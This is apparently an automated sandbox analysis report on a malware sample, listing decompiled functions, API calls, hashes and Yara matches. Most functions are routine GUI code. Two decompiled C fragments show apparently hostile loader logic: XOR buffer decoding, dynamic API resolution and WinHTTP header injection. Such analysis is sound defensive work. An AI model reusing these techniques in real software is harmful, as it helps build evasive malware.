Instruction Fuzzy Hash: D9615B71A01605CFCB09DF68C895BAA73B9FF09304F1441B9ED15AF296DB71A906CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0012AF7F, Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0012AF86
GlobalFix.KERNEL32(00000000), ref: 0012B089
GlobalUnWire.KERNEL32(00000000), ref: 0012B164
GlobalFree.KERNEL32(00000000), ref: 0012B16B

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Global$FreeH_prolog3_catchWire
String ID:
API String ID: 349731180-0
Opcode ID: b243a9693524ca297483fe0920afdcd0088ef627b59a4df94bd44112e628950b
Instruction ID: 1d5e1b0ace163f297e384ee87d1814a71b8060fb6ec5810a34b1f0d5fb00b5f8
Opcode Fuzzy Hash: b243a9693524ca297483fe0920afdcd0088ef627b59a4df94bd44112e628950b
Instruction Fuzzy Hash: 8D51A530E002299FCF09EFA4E895AEEBBB4BF18310F154019F912B7291DB349E51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00133825, Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

InflateRect.USER32(?), ref: 001338F8
InflateRect.USER32(?), ref: 0013395D
InflateRect.USER32(?,000000FE,000000FE), ref: 00133991

Part of subcall function 0012FFE2: __EH_prolog3.LIBCMT ref: 0012FFE9

InflateRect.USER32(?,000000FE,000000FE), ref: 001339C3

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: InflateRect$H_prolog3
String ID:
API String ID: 3346915232-0
Opcode ID: 946f1661cd58615af523251e841e93dae78a6128e0b6be8cd38c2da510e29588
Instruction ID: 21d7b9b72a5b547c45f4757456890561a25fe010fe3ecc4b861acaf137dee7b1
Opcode Fuzzy Hash: 946f1661cd58615af523251e841e93dae78a6128e0b6be8cd38c2da510e29588
Instruction Fuzzy Hash: EC418E31504214EFCB24AF64DD48FAA7BBABF56324F05466DF866861A1CBB09A50CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00135031, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,00000018,?), ref: 001350C9
DeleteObject.GDI32(00000000), ref: 00135193
DeleteObject.GDI32(00000000), ref: 0013519C
DeleteObject.GDI32(00000000), ref: 001351AB

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Object$Delete
String ID:
API String ID: 774837909-0
Opcode ID: a331541b24d78e514c3a3fa942475c87ad715b58bf85efd98db2c1d06c0347a3
Instruction ID: b4cb5a891fa2b8bdd7afb1a75c957b574c571e4167bb8acd177b7a45d2889e08
Opcode Fuzzy Hash: a331541b24d78e514c3a3fa942475c87ad715b58bf85efd98db2c1d06c0347a3
Instruction Fuzzy Hash: 83416B72A00A09DBDF28DFA4C885BEEB7B6AB54B00F258125F811A7280D775CD84CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00120141, Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 001201B0
IsMenu.USER32(?), ref: 001201EC
AdjustWindowRectEx.USER32(?,00000000,00000000), ref: 001201FF
GetClientRect.USER32(?,?), ref: 0012024C

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$Client$AdjustMenuWindow
String ID:
API String ID: 2631253777-0
Opcode ID: 39dda6ab25362ab1f0c1cda0284d80c301ad7fc284930d7cb7a7b8b2a5d01419
Instruction ID: a04fb2806c8e5392ae1401071c6d4ea2a6d467a055bb92dbf873afc51f6133e3
Opcode Fuzzy Hash: 39dda6ab25362ab1f0c1cda0284d80c301ad7fc284930d7cb7a7b8b2a5d01419
Instruction Fuzzy Hash: 32319571E00229AFCB05EFA4E899D7FBBB8FF58710F00415AE905A7201DB709E10CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0011D1D8, Relevance: 6.1, APIs: 4, Instructions: 112windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(00000000,?,?), ref: 0011D298
GetFocus.USER32 ref: 0011D2B0
GetParent.USER32(?), ref: 0011D2BE
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 0011D2D3

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: EnableFocusItemMenuMessageParentSend
String ID:
API String ID: 2297321873-0
Opcode ID: 2a59ad2c3526a794e1fff9b8dd914097c741ec8b57fce9a8cfacc67bdbafb664
Instruction ID: fda84175ec1c42d0271a53bc472cad460c7671a3f4a80f3eaa851463fc3decfd
Opcode Fuzzy Hash: 2a59ad2c3526a794e1fff9b8dd914097c741ec8b57fce9a8cfacc67bdbafb664
Instruction Fuzzy Hash: 2931A431600615EFCB28AF64E885FAAB7B9FF55311F108639F42697690DB70EC90CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00130599, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 001305C2
GetClientRect.USER32(?,?), ref: 00130609
GetWindowRect.USER32(?,?), ref: 0013064F
GetSystemMetrics.USER32(00000007), ref: 00130663

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$ClientMetricsParentSystemWindow
String ID:
API String ID: 2120119201-0
Opcode ID: 1d89584bd5237ea3981248d66a2753eac44ae932f4e232a42b8fdef6608546b7
Instruction ID: d2a0b0a1fe2371f5c9c8f07197009fd7ac86970e1a47b5f1fb2681cabad5957f
Opcode Fuzzy Hash: 1d89584bd5237ea3981248d66a2753eac44ae932f4e232a42b8fdef6608546b7
Instruction Fuzzy Hash: 8831F4B1D002199FCF05EFA8E8959EEBBF5FF49300B10416AE905EB215DB71A911CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00129C59, Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(00000000), ref: 00129C64
GetClientRect.USER32(?,00000000), ref: 00129C84
GetParent.USER32(?), ref: 00129CA3
OffsetRect.USER32(00000000,00000000,00000000), ref: 00129D27

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Rect$ClientEmptyOffsetParent
String ID:
API String ID: 3819956977-0
Opcode ID: 26000f301da31117d6e4359b79bb98efe41de64d8598c4791e4ab7834b25e5a2
Instruction ID: 2330789d7bd207e09db4601da890f2e1b7bba4927f65acb8ef85a767f7e333ed
Opcode Fuzzy Hash: 26000f301da31117d6e4359b79bb98efe41de64d8598c4791e4ab7834b25e5a2
Instruction Fuzzy Hash: 83310736200616EFD718DF69F894E65B7A4FF45720B14822EF909CB295DB30EC60CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0013362B, Relevance: 6.1, APIs: 4, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0013364A
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 001336D6
GetParent.USER32(?), ref: 001336E6
SendMessageW.USER32(00000000,00000111), ref: 00133711

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: MessageParentSend
String ID:
API String ID: 928151917-0
Opcode ID: 112b4f02910a94edd0a51a692936b94d72f03e4d6c754c5604155e7f0390696a
Instruction ID: 3b13af287068f8de1d89b39abefb9dc41a1f2fe8fc74f800528f0195425919bb
Opcode Fuzzy Hash: 112b4f02910a94edd0a51a692936b94d72f03e4d6c754c5604155e7f0390696a
Instruction Fuzzy Hash: D821F7B2D04210BFDF257BB1AC8AA6E7BA5FB48710F10063EF966D7151EB308A409B14

Uniqueness

Uniqueness Score: -1.00%

Function 0012EFB8, Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

SetBkColor.GDI32(00000000,?), ref: 0012EFD4
ExtTextOutW.GDI32(00000000,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 0012EFE9
CreatePatternBrush.GDI32(00000000), ref: 0012F04E
DeleteObject.GDI32(00000000), ref: 0012F05A

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: BrushColorCreateDeleteObjectPatternText
String ID:
API String ID: 1519795524-0
Opcode ID: c490f3ddd7559cbc8e0bcfc2c357fbbd7c9cc86c9ac9a8852d43bc64cb881bce
Instruction ID: 59c7760b785d79c06d71fda748629ca197726bb0ba93953507040624bcf89a6d
Opcode Fuzzy Hash: c490f3ddd7559cbc8e0bcfc2c357fbbd7c9cc86c9ac9a8852d43bc64cb881bce
Instruction Fuzzy Hash: 57212535601628AFDB25AB64FD0DFBF77A9EB95B11F004039F80682191CB704D91CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00129745, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00129765

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: fb3c23b983ff25cd132e48fd51bec79dca29c17e7bb936499367ea5798d2106f
Instruction ID: 019cd97ffe9ec0d8fb06613fd08ae46b7118a5b3c463082ccf532382047a7c78
Opcode Fuzzy Hash: fb3c23b983ff25cd132e48fd51bec79dca29c17e7bb936499367ea5798d2106f
Instruction Fuzzy Hash: 5521CF75250715AFD7246F78FC4AF27BAA8EB81755F00453EF94286290EBB0E9108E61

Uniqueness

Uniqueness Score: -1.00%

Function 00151905, Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,00000000,?,?,?,001518F1,00000000,00000000,?,000D9C54,000D9C54,?,001526FF,?,00000000), ref: 00151912
GlobalFix.KERNEL32(00000000), ref: 0015192A
RtlEnterCriticalSection.NTDLL(0028A14C), ref: 0015195F
RtlLeaveCriticalSection.NTDLL(0028A14C), ref: 001519C9

Part of subcall function 00118704: __CxxThrowException@8.LIBVCRUNTIME ref: 00118718

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: CriticalGlobalSection$AllocEnterException@8LeaveThrow
String ID:
API String ID: 1029332213-0
Opcode ID: 724066c068ed5444b03a0d4031fb073cf1477f3f53afc7c26b53f41e9bf0609b
Instruction ID: 010b997ae2fbe314567d4c8b38c00f02f9af62a684467e684fd49ac9bdb9e040
Opcode Fuzzy Hash: 724066c068ed5444b03a0d4031fb073cf1477f3f53afc7c26b53f41e9bf0609b
Instruction Fuzzy Hash: CF210435601204FBDF12AB64AC5DB6E73AAAB59316F10402AFC05DB251DF74CD44C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 002527FD, Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5171c3cfb9a0c04759a5a9666830faeeadf06a646b0b5635f7a13935b6796fd6
Instruction ID: de80885879a7a8f6fff02b0b83b628f397c82c683019612dee20a93c84abc3dd
Opcode Fuzzy Hash: 5171c3cfb9a0c04759a5a9666830faeeadf06a646b0b5635f7a13935b6796fd6
Instruction Fuzzy Hash: 5C219231931205FBDB206FE4AC0DF5E7BA4EBC2762F150125E951AB1D0DBB09C18D678

Uniqueness

Uniqueness Score: -1.00%

Function 000D12F9, Relevance: 6.1, APIs: 4, Instructions: 69
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E000D12F9(void* __ebx, void* __eflags) {
				char _v8;
				void* _v12;
				char _v524;
				void _v528;
				void* __ebp;
				void* _t46;
				signed int _t48;
				void* _t55;
				void* _t56;

				if(E000D121E( &_v12,  &_v8) == 0) {
					_t48 = 0;
					do {
						 *(_t56 + _t48 - 0x20c) = ( *(0xd4100 + _t48 * 2) & 0x000000f0 |  *(0xd4101 + _t48 * 2) >> 0x00000004) ^ _t48;
						_t48 = _t48 + 1;
					} while (_t48 < 0x204);
					if(E000D2395(_v528,  &_v524,  &_v12,  &_v8) != 0) {
						memset( &_v528, 0, 0x204);
						if(_v8 >= 0x400) {
							WaitForSingleObject(0xffffffff, 0xea60);
							_t55 = _v12;
							_push(0);
							E000D11E0(__ebx, _t55, _v8);
							if(_t55 != 0) {
								HeapFree(GetProcessHeap(), 0, _t55);
							}
						}
					}
					L11:
					return 0;
				}
				_t46 = _v12;
				if( *((intOrPtr*)(_t46 + 5)) != 0 &&  *((intOrPtr*)(_t46 + 1)) != 0) {
					E000D1000(_t46, _v8);
				}
				goto L11;
			}

0x000d130f
0x000d1336
0x000d133d
0x000d1355
0x000d135c
0x000d135d
0x000d137e
0x000d138a
0x000d1399
0x000d13a2
0x000d13a8
0x000d13b0
0x000d13b2
0x000d13ba
0x000d13c6
0x000d13c6
0x000d13ba
0x000d1399
0x000d13cd
0x000d13d2
0x000d13d2
0x000d1311
0x000d1318
0x000d132b
0x000d132b
0x00000000

APIs

Part of subcall function 000D121E: GetCommandLineA.KERNEL32(-id=), ref: 000D122F
Part of subcall function 000D121E: StrStrIA.KERNELBASE(00000000), ref: 000D1236
Part of subcall function 000D121E: StrToIntA.SHLWAPI(-00000004), ref: 000D1248
Part of subcall function 000D121E: GetTempPathA.KERNEL32(00000104,?), ref: 000D125D
Part of subcall function 000D121E: wsprintfA.USER32 ref: 000D1275
Part of subcall function 000D121E: GetProcessHeap.KERNEL32(00000000,?), ref: 000D12CA
Part of subcall function 000D121E: HeapFree.KERNEL32(00000000), ref: 000D12D1

memset.MSVCRT ref: 000D138A
WaitForSingleObject.KERNEL32(000000FF,0000EA60), ref: 000D13A2
GetProcessHeap.KERNEL32(00000000,?), ref: 000D13BF
HeapFree.KERNEL32(00000000), ref: 000D13C6

Part of subcall function 000D1000: LoadLibraryA.KERNEL32(KERNEL32.DLL,?,00000400,?), ref: 000D102E
Part of subcall function 000D1000: GetProcAddress.KERNEL32(00000000), ref: 000D1035
Part of subcall function 000D1000: LoadLibraryA.KERNEL32(KERNEL32.DLL,?), ref: 000D107C
Part of subcall function 000D1000: GetProcAddress.KERNEL32(00000000), ref: 000D1083
Part of subcall function 000D1000: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 000D10C1

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: Heap$AddressFreeLibraryLoadProcProcess$CommandFileLineModuleNameObjectPathSingleTempWaitmemsetwsprintf
String ID:
API String ID: 1757398554-0
Opcode ID: 1a895f98ecc297f9241b9fd762de39c4f23c6d76d40e4fa49635495c8d47440a
Instruction ID: 357339b03bbb1f40f77e7ac2723c4bfcefcc62bcc7e1c0bf086c959b44bc3424
Opcode Fuzzy Hash: 1a895f98ecc297f9241b9fd762de39c4f23c6d76d40e4fa49635495c8d47440a
Instruction Fuzzy Hash: 84215B35600309BBDB10DBA4DC09BDE7BB69B80310F244297E914A33D2DE745B85CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 000D20BA, Relevance: 6.1, APIs: 4, Instructions: 69
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E000D20BA(intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				int _t17;
				intOrPtr _t25;
				signed int _t28;
				void* _t31;
				intOrPtr _t33;
				void* _t38;

				_push(_t27);
				_v8 = _v8 & 0x00000000;
				_v12 = 4;
				if(_a12 != 0x10) {
					L12:
					return _t17;
				}
				_t17 =  &_v8;
				__imp__WinHttpQueryOption(_a4, 0x4e, _t17,  &_v12);
				if(_t17 == 0) {
					goto L12;
				}
				_t17 = _v8;
				if(_t17 == 0) {
					goto L12;
				}
				_t17 =  *(_t17 + 0xc);
				if(_t17 == 0) {
					goto L12;
				}
				_t36 =  *((intOrPtr*)(_t17 + 8));
				if( *((intOrPtr*)(_t17 + 8)) == 0) {
					L11:
					return _t17;
				}
				_t33 =  *((intOrPtr*)(_t17 + 0x48));
				if(_t33 == 0) {
					L10:
					goto L11;
				}
				_t25 =  *((intOrPtr*)(_t17 + 0x44));
				_t31 = 0;
				_t28 = 0x811c9dc5;
				if(_t25 == 0) {
					L8:
					_t17 = E000D1FE0(_t31, 0 |  *_t36 == (_t28 & 0x7fffffff));
					_t38 = _t17;
					if(_t38 != 0) {
						__imp__WinHttpAddRequestHeaders(_a4, _t38, 0xffffffff, 0xa0000000);
						_t17 = HeapFree(GetProcessHeap(), 0, _t38);
					}
					goto L10;
				} else {
					goto L7;
				}
				do {
					L7:
					_t28 = ( *(_t33 + _t31) & 0x000000ff ^ _t28) * 0x1000193;
					_t31 = _t31 + 1;
				} while (_t31 < _t25);
				goto L8;
			}

0x000d20be
0x000d20bf
0x000d20c7
0x000d20ce
0x000d216a
0x000d216a
0x000d216a
0x000d20d8
0x000d20e1
0x000d20e9
0x00000000
0x00000000
0x000d20eb
0x000d20f0
0x00000000
0x00000000
0x000d20f2
0x000d20f7
0x00000000
0x00000000
0x000d20fa
0x000d20ff
0x000d2166
0x00000000
0x000d2166
0x000d2102
0x000d2107
0x000d2165
0x00000000
0x000d2165
0x000d210a
0x000d210d
0x000d210f
0x000d2116
0x000d2129
0x000d2137
0x000d213c
0x000d2142
0x000d214f
0x000d215f
0x000d215f
0x00000000
0x00000000
0x00000000
0x00000000
0x000d2118
0x000d2118
0x000d211e
0x000d2124
0x000d2125
0x00000000

APIs

WinHttpQueryOption.WINHTTP(00000004,0000004E,00000000,00000004), ref: 000D20E1
WinHttpAddRequestHeaders.WINHTTP(00000004,00000000,000000FF,A0000000), ref: 000D214F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 000D2158
HeapFree.KERNEL32(00000000), ref: 000D215F

Memory Dump Source

Source File: 00000000.00000002.551228989.00000000000D1000.00000020.00020000.sdmp, Offset: 000D0000, based on PE: true

Associated: 00000000.00000002.551211478.00000000000D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.551305946.00000000000D4000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d0000_sample4.jbxd

Yara matches

Similarity

API ID: HeapHttp$FreeHeadersOptionProcessQueryRequest
String ID:
API String ID: 3136366819-0
Opcode ID: 24400695007b48e50cba999f88c5045fbc713844e118b1a89c6387faa549370d
Instruction ID: a0a1313afe1efaf848c09756ec78ca8eaa4a00e28709d107340fc4828f7a3151
Opcode Fuzzy Hash: 24400695007b48e50cba999f88c5045fbc713844e118b1a89c6387faa549370d
Instruction Fuzzy Hash: 2911A536601314ABDB108F65DC44FAF7BECEB24721F15822ABB0597290D774D94086B0

Uniqueness

Uniqueness Score: -1.00%

Function 0012A36D, Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

BeginDeferWindowPos.USER32(00000000), ref: 0012A38F
IsWindow.USER32(?), ref: 0012A3AA
DeferWindowPos.USER32(00000000,?,00000000,?,00000000,?,00000000,00000000), ref: 0012A3FA
EndDeferWindowPos.USER32(00000000), ref: 0012A405

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Defer$Begin
String ID:
API String ID: 2880567340-0
Opcode ID: 06b97bd8016c1c95363667287d0d643f8bd84610ed395eaa73415a75d6684a97
Instruction ID: a2a66cf1ac98c26df1e215acf0ca673b64104069cff6a4892fa4c21d8fed8770
Opcode Fuzzy Hash: 06b97bd8016c1c95363667287d0d643f8bd84610ed395eaa73415a75d6684a97
Instruction Fuzzy Hash: 6A210E71E00219AFCB15EFA9EC48AAEBBF8FF48300F544169E505E3250DB74A9519B91

Uniqueness

Uniqueness Score: -1.00%

Function 00129E4D, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

GlobalFix.KERNEL32(00000000), ref: 00129E61
lstrcmpW.KERNEL32(00000000,?), ref: 00129E72
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00129EAF
GlobalFix.KERNEL32(00000000), ref: 00129EB9

Part of subcall function 001266AB: GlobalFlags.KERNEL32(?), ref: 001266B8
Part of subcall function 001266AB: GlobalUnWire.KERNEL32(?), ref: 001266C6
Part of subcall function 001266AB: GlobalFree.KERNEL32(?), ref: 001266D2

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Global$AllocFlagsFreeWirelstrcmp
String ID:
API String ID: 396917142-0
Opcode ID: 2dfe9d6a403fb8cda15571d4d07d0528d604bc54c8ffaa0d06286e3dd0153036
Instruction ID: 03c62efbccc1febd4cebf851de466ee1ebc094e8b0184b3abe994f191248e154
Opcode Fuzzy Hash: 2dfe9d6a403fb8cda15571d4d07d0528d604bc54c8ffaa0d06286e3dd0153036
Instruction Fuzzy Hash: 9D119E71040618BFEF22AFA5EC89DABBBACEF04744F10046AFA4190031DB71DDA0DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0012AE07, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,00000005), ref: 0012AE39
LoadResource.KERNEL32(?,00000000), ref: 0012AE41
LockResource.KERNEL32(?), ref: 0012AE4F
FreeResource.KERNEL32(?), ref: 0012AE9F

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 219a400e9dc2f7b7d6b39f8108f29dccdd8d86049cad80344db37fc5c9e0426e
Instruction ID: afa7c57ccc03f9892301e2be5c5d670a9fa61531052bfc9441f42d1598c3e581
Opcode Fuzzy Hash: 219a400e9dc2f7b7d6b39f8108f29dccdd8d86049cad80344db37fc5c9e0426e
Instruction Fuzzy Hash: 8011E031500232EBCB249F94E808BB6B7B8FF44751F5680B5EC088B240EB749861D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0011FF8D, Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

GetObjectW.GDI32(?,0000000C,?), ref: 0011FFD8
SetBkColor.GDI32(?,?), ref: 0011FFE2
GetSysColor.USER32(00000008), ref: 0011FFF2
SetTextColor.GDI32(?,?), ref: 0011FFFA

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Color$ObjectText
String ID:
API String ID: 829078354-0
Opcode ID: b9b3f991460f2fa1263d74b5742b514e0a55305b517fb63307722d829547ad2d
Instruction ID: d8db3cb735ddd840cbcbefc944b2bcc93d2ec1f85bddf8bfd03925db8d1bd669
Opcode Fuzzy Hash: b9b3f991460f2fa1263d74b5742b514e0a55305b517fb63307722d829547ad2d
Instruction Fuzzy Hash: CD11C432600119ABEB15EF68AC48ABF73B9EF5E351F510614F925D3181DB30DC61C795

Uniqueness

Uniqueness Score: -1.00%

Function 001260F0, Relevance: 6.0, APIs: 4, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(000D2D64), ref: 00126102
GetProcAddress.KERNEL32(00000000,000D2D7C), ref: 00126112
RtlEncodePointer.NTDLL(00000000), ref: 0012611B
RtlDecodePointer.NTDLL(00289814), ref: 00126129

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID:
API String ID: 2061474489-0
Opcode ID: ade24616a7730516c3b720f68d706e78e3fb800a3702a3c3da135fa37f4f8696
Instruction ID: 6a1a7f1e04780ca5136feb610bf85ed276bfeaa79e72f78b373334cac44b4238
Opcode Fuzzy Hash: ade24616a7730516c3b720f68d706e78e3fb800a3702a3c3da135fa37f4f8696
Instruction Fuzzy Hash: F311B33650022AFFCF126FA0EC099DE3F6AEB4D751B054115FE05A1160CB76D970AFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0012269A, Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 001226A1
GetTopWindow.USER32(00000000), ref: 001226E4
GetWindow.USER32(00000000,00000002), ref: 00122706

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 1577824f2f2539a9d77bf0fe378cfbbba6693aca896a168efa8be306cc245e47
Instruction ID: 91382e069e3e4d380363ee509e4e3b40ff3657fdae781cacc811d8a06bc344a4
Opcode Fuzzy Hash: 1577824f2f2539a9d77bf0fe378cfbbba6693aca896a168efa8be306cc245e47
Instruction Fuzzy Hash: DA01CC36105129BBCF126F91FC09EDE3B2ABF26351F054014FE1555060CB7ACAB5EBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0011F954, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,000000F0), ref: 0011F978
LoadResource.KERNEL32(?,00000000), ref: 0011F984
LockResource.KERNEL32(00000000), ref: 0011F991
FreeResource.KERNEL32(00000000,00000000), ref: 0011F9AD

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 55354082d68ec9a3e4020d862371b10bf5515f1e9b394612ede0aa7c1abaceb1
Instruction ID: 01b464cb34148bd4cf89eb311602ad6e70dbd1986fb6be7a69c1462a5a74a47c
Opcode Fuzzy Hash: 55354082d68ec9a3e4020d862371b10bf5515f1e9b394612ede0aa7c1abaceb1
Instruction Fuzzy Hash: 03F0FF36601219BB8725BBA9AC48EAFB66CAB85B657190079FC0993201DF70CC4182A0

Uniqueness

Uniqueness Score: -1.00%

Function 0011FA77, Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 0011FA81
GetTopWindow.USER32(00000000), ref: 0011FA8E

Part of subcall function 0011FA77: GetWindow.USER32(00000000,00000002), ref: 0011FADD

GetTopWindow.USER32(?), ref: 0011FAC2

Memory Dump Source

Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d6000_sample4.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: e663817ef872ef5d6f47f06a66c3e442cebf20493938d915c182514aaa62b2d3
Instruction ID: 45e96ec26b77cc05f65d6a3169d23a9369753a75983bd84fd2eec1fcd1e699cd
